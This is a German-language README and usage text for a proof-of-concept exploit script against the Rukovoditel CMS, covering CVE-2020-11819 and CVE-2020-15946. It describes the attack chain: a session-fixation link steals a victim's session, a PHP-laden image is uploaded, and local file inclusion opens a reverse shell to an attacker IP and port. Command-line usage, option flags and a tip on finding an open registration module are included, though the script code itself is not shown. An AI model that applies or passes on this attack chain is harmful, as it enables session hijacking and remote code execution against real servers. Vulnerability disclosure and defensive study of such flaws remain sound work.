
Proof of Concept für CVE-2020-11819 und CVE-2020-15946
Proof of Concept für CVE-2020-11819 und CVE-2020-15946. Getestet auf Rukovoditel 2.4.x, 2.5.x und 2.6.1
Dieser Exploit hat zwei Ausführungsmodi: entweder über die Session-Fixation-Schwachstelle (CVE-2020-15946) oder über die Zugangsdaten eines beliebigen Kontos in einem beliebigen Profil.
Mit der Option --type L erstellt dieses Skript einen bösartigen Link. Wenn das Opfer den Link in einem Browser aufruft, wird eine beliebige Session-ID gesetzt, mit der die Session gestohlen wird, nachdem ein Bild mit PHP-Inhalt auf das Profilfoto hochgeladen wurde. Anschließend wird Local File Inclusion (CVE-2020-11819) verwendet, um eine bequeme Reverse Shell zu erhalten. Alternativ können Sie mit den Optionen --type C -u -p Zugangsdaten angeben, das Bild mit PHP-Inhalt hochladen und Local File Inclusion (CVE-2020-11819) nutzen, um die Codeausführung zu erreichen.
Profi-Tipp: Denken Sie daran zu prüfen, ob das Registrierungsmodul aktiviert ist ;)
exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]
RCE nach der Authentifizierung für Rukovoditel, Skriptversion 1.0
optionale Argumente:
-h, --help zeigt diese Hilfemeldung an und beendet das Programm
-t URL, --target URL URL/vollständiger Pfad zum CMS Rukovoditel http://url/path/to/cms/
-u USER, --user USER Benutzername für die Authentifizierung
-p PASSWORD, --password PASSWORD Passwort für die Authentifizierung
-a TYPE, --type TYPE Verwenden Sie -a L, um den Link zu erzeugen und die Session zu stehlen, oder -a C, wenn Sie Zugangsdaten für die Webanwendung besitzen
--ip IP_ATTACKER IP-Adresse des Angreifers für die Reverse Shell!
--port PORT_ATTACKER Port für die Reverse-Shell-Verbindung
--proxy PROXY HTTP-Proxy für das Debugging einrichten